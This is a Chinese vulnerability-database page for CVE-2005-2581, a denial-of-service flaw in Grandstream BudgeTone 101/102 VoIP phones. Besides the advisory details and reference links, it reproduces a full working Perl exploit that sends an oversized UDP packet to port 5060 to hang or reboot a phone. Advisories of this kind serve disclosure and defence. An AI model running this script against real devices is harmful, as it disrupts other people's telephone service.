CVE-2005-2581
CVSS5.0
发布时间 :2005-08-16 00:00:00
修订时间 :2016-10-17 23:28:47
NMCOE    

[原文]Grandstream BudgeTone 101 and 102 running firmware 1.0.6.7 and possibly earlier versions, allows remote attackers to cause a denial of service (device hang or reboot) via a large UDP packet to port 5060.


[CNNVD]Grandstream Budge Tone 拒绝服务漏洞(CNNVD-200508-150)

        Grandstream BudgeTone 101和102运行固件1.0.6.7及可能早期版本允许远程攻击者借助于对5060端口的大的UDP包造成拒绝服务(设备挂起或重启)。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/h:grandstream:budgetone_102:1.0.6.7
cpe:/h:grandstream:budgetone_101:1.0.6.7

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2581
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2581
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200508-150
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=112388062328906&w=2
(UNKNOWN)  BUGTRAQ  20050812 Grandstream Budge Tone 101/102 DoS Vulnerability
http://securitytracker.com/id?1014665
(UNKNOWN)  SECTRACK  1014665
http://www.securityfocus.com/bid/14539
(UNKNOWN)  BID  14539

- 漏洞信息

Grandstream Budge Tone 拒绝服务漏洞
中危 其他
2005-08-16 00:00:00 2005-10-20 00:00:00
远程  
        Grandstream BudgeTone 101和102运行固件1.0.6.7及可能早期版本允许远程攻击者借助于对5060端口的大的UDP包造成拒绝服务(设备挂起或重启)。

- 公告与补丁

        暂无数据

- 漏洞信息 (1153)

Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit (EDBID:1153)
hardware dos
2005-08-12 Verified
0 Pierre Kroma
N/A [点击下载]
#!/usr/bin/perl
#
use IO::Socket;
use Term::ANSIColor;

############################ U S A G E ###################################
system ("clear");
print "\nGrandstream BT101/BT102 DoS\n";
print "written by pierre kroma (kroma\@syss.de)\n\n";

if (!$ARGV[2]){
print qq~
Usage: perl grandstream-DoS.pl -s <ip-addr> <udp-port> {-r/-s}

	<ip-addr>  = ;-)
	<udp-port> = 5060

	-r = 'reboot' 	the Grandstream BT 101/102
	-s = 'shutdown' the Grandstream BT 101/102

~; exit;}
################################## D E F I N I T I O N S####################

$victim = $ARGV[0];
$port = $ARGV[1];
$option = $ARGV[2];

if ( $option == 'r' || $option == 'R' )
{	$request= 'k'x65534;}

if ( $option == 's' || $option == 'S' )
{	$request= 'p'x65535;}
else
{	print "Wrong parameter - try it again";
	exit;
}


# ping the remote device
print color 'bold blue';
print "\nping the remote device $victim\n";
print color 'reset';
system("ping -c 3 $victim");

print color 'bold red';
print "\n Wait ... \n\n\n";
print color 'reset';
$sox = IO::Socket::INET->new(Proto=>"udp",PeerPort=>"$port",PeerAddr=>"$victim");

print $sox $request;
sleep 1;
close $sox;

# ping the remote device
print color 'bold blue';
print "ping the remote device $victim again\n";
print color 'reset';
system("ping -c 3 $victim");

# milw0rm.com [2005-08-12]
		

- 漏洞信息

18731
Grandstream Budge Tone Malformed UDP Packet DoS
Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-08-12 2005-07-20
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站